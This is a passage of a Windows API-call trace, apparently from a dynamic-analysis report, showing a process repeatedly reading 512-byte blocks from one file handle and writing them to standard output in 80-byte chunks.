(hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.636] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.636] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.637] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.637] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.639] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.639] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.640] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.640] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.641] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.641] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.643] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.643] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.644] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.644] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, 